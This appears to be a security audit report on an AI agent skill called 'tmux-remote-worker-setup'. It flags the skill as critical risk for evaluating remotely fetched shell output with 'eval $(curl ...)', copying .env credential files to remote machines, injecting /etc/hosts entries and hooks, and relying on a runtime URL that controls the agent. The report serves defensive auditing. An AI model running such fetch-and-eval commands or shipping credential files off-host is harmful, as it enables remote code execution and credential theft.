tmux-remote-worker-setup

Fail

Audited by Snyk on Apr 13, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 1.00). This is high risk: it's an unencrypted HTTP endpoint on an unfamiliar/likely internal domain that the skill explicitly evals (eval $(curl ...)), so it can deliver arbitrary shell instructions or proxy settings and therefore could be used to distribute malware or capture credentials.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 0.90). The skill contains high-risk patterns: it evals remote-fetched shell output (eval $(curl ...)), automatically copies local config/.env files (potentially leaking credentials) to remote machines, injects /etc/hosts entries and persistent notify hooks, and uses proxy bootstrapping that can route commands through an external host — together these behaviors enable remote code execution, credential exposure, traffic redirection, and potential covert exfiltration/persistence despite there being no obfuscated payloads.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

Issues (3)

E005 (CRITICAL): Suspicious download URL detected in skill instructions.

E006 (CRITICAL): Malicious code pattern detected in skill scripts.

W012 (MEDIUM): Unverifiable external dependency detected (runtime URL that controls agent).

Audit Metadata

Risk Level: CRITICAL
Analyzed: Apr 13, 2026, 08:37 AM
Issues: 3